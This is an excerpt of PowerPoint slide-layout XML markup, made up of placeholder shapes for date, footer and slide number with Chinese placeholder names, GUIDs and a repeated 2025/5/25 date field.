                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D654C5E3-1DD6-4A6C-ABA1-40110997559C}"/>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73C58F09-4272-43A5-B1D5-A91D3075534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50554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7800516-AE98-4303-9868-3445414669F7}"/>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2C2F6625-AE0C-4558-8D68-94065BCF23BA}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05194D6E-AD30-4A9E-9C06-88E78E4F1A8A}"/>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6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87905998-64E1-43FD-BE9A-24C08EF9199F}"/>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08AEE256-F318-4248-B1B9-1B55CACC1FD8}"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81904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EDAE691-954C-4639-9B1D-5940BE59691A}"/>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B618C5A7-4A00-4C0E-8282-199723D6ADF6}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C18E535E-E157-4E39-BE5E-878D5DC9C1D1}"/>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6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4777191-3040-42DF-BBC8-7300D4F5ED5E}"/>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46A31ACE-9B8C-4997-8090-2EBE4BA65AD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794810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447E281-AF48-4B42-9DC0-A76B36507DFF}"/>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5F7DEBC6-88BA-47D3-AF20-1287A3F37281}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1D81CE-DD31-48B6-A93F-24B1FD99E784}"/>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7" name="灯片编号占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9DB2845-95B4-4829-B369-35C9F0E9C887}"/>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F22939C7-15FA-481F-99B0-E39021E9316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4302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2AB2DEA-7DC9-40D6-A247-71971C3D2C71}"/>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FE6E0472-527A-482E-84F3-0CF291151184}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="页脚占位符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1379982-F150-4561-A402-8AAFA0F64CAA}"/>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9" name="灯片编号占位符 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8888431-8BB0-4C89-B70D-6800830FF55B}"/>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1381C9E8-154C-4D4F-B80E-C1D7D3A30232}"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053939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A7FD57-BCBB-4F27-9E14-E7A435A6ADE5}"/>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8AA25F25-DC71-431E-B738-953A59B5C8E5}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D11E5A-1A42-4048-9CFC-FB9D01719A62}"/>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5" name="灯片编号占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5119E46-C2E2-4093-9F05-1AA68EA3F492}"/>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C712AD94-455F-4561-94B1-48EF8319E2D6}"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31401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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A428F5A0-DC14-4EAD-B804-CDFF39FBEBF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7BBE9C9B-20B0-4990-AE7F-40ACB4A712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AC7A077F-B9EA-4BFB-BF59-CAE9B90C7792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2632974F-C775-47CE-91F8-E5954ED3ABC4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="730242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D73213-F212-4A83-8C45-0E2A3E3D46F1}"/>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B0A09D84-007C-49A0-A031-177478B1F96C}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C386CBDA-6232-4D86-9F07-1376FC021985}"/>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4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1598E3F1-E191-4AA4-9F43-96F3BC913DE0}"/>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AD8CEB8A-B0FD-49EC-B40B-76B8A62ECDAE}"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49418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498F9B-EDE0-4285-ADD9-25908D886A17}"/>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C533A3B0-FC14-46F6-994F-A7E1CFCC6CC5}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2BB7D-BED3-448A-A25A-0DD6DC48AA1B}"/>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7" name="灯片编号占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4848F56-6CB7-47A6-806D-9326D6D1E34D}"/>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7993F904-31A2-4FBB-9827-F356643E0E71}"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2121207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6C70F60-F399-4800-9B4F-43E39751F773}"/>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D72E7A73-CBD0-4E5A-8BB4-01E49B80DEEB}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCA655A-40AC-4B1D-B066-F0DB163EB5A1}"/>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7" name="灯片编号占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B05AA324-686B-4EAB-BA5A-0C8AD516867D}"/>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D8438B41-A1EC-44B9-A016-E0713F67FE50}"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0986937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EEEA896-EDF5-4AB2-9A41-928F733C074B}"/>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9A594443-FA2F-48A3-B6E8-27021CCCEC9F}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4840C08D-C61A-4E87-BCA5-5A57DA0411C2}"/>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6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B65C9DA-6FBB-4855-BD20-E9227613AFE2}"/>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2BBB4373-3E11-46A9-8A1B-8B8D8C3E44C9}"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7321558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7E8B32D-7239-4BF4-83D9-B1FE5FEC0A2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr kumimoji="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8A6716FD-5245-4249-AA4F-900E2A01A4EA}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4CAE369-73AC-45A1-85A7-A585638842A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr kumimoji="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB0C06F-EC4E-410A-884B-3202DC813EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr kumimoji="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{05A2853C-2BC1-4B96-BEEE-AF8DEB18CB74}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1375832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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9919997-D62D-44BC-A89C-3BEAF50B0F1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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CE5252-56F7-4850-8233-45C35108830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313C16DF-FEB5-487D-BBF0-B238BE22DFC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{757573A7-8DB9-4802-9F35-AEF042C86234}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1932615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371600" y="19812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257800" y="1981200"/>
            <a:ext cx="3733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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC016CEE-1C19-4B6B-B629-C2865FB921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9A675B13-24CB-4D66-87F2-37B274D637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54D5B0F7-5113-4674-B9E0-572D8D787A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A67FFFC9-37A5-4872-AE64-9F759B96514B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3219629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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93C3D9CA-D91E-4794-9F50-1AECD735CCC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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39290C5-EAC8-4075-8214-2E1F5EA615A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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA2C856F-0D03-441C-8397-C4800C7DD6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{25996FEA-0159-42EB-8E8B-2F5F73B1D7E2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128169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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E61D41B2-2346-4BE7-9756-E540C7D3FB1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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD33B02B-7B3D-4E9D-B090-FA1FF47953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E57923B-B4E2-4FFA-95FB-47DA71CB2DFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{276492F7-AE95-42A0-BA93-02DF7E71AE5D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167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B51A5AFC-B1BD-4408-89B9-7D467E1F77A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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{269E849F-CAD4-45E4-AD31-D990F721D87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E809063D-BB8F-4172-AA80-96E9B5894738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9BE70260-F633-4223-8363-428CF90B0437}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240210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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CD8BAFF-5AE5-4F1A-842A-1A5AE7A9C9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94F45361-0737-481C-8B72-AF935A9897D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FFB3830B-78FA-4E01-B5C2-32E0662BAB84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0F0B3C19-B643-45E6-A028-CB818DFE784E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27461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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6045D2-5C12-42A6-B4BD-DF544D6D1B5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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF6EEC8A-DD47-422E-922B-4A5DF2BAF54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0D52C75F-3F6B-445A-A56A-9876461E3415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E4C0ADD3-484B-487A-8D65-1F482FDB3790}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="696441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3A9CE9A-10DD-4BA8-B1E3-3696BB5342C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="533400"/>
            <a:ext cx="754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67BD0258-DCF2-4549-8CC8-06E6E14EAD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="6248400"/>
            <a:ext cx="16764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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr kumimoji="0" sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA6DEAC4-CE9F-417C-AE72-320C30282312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
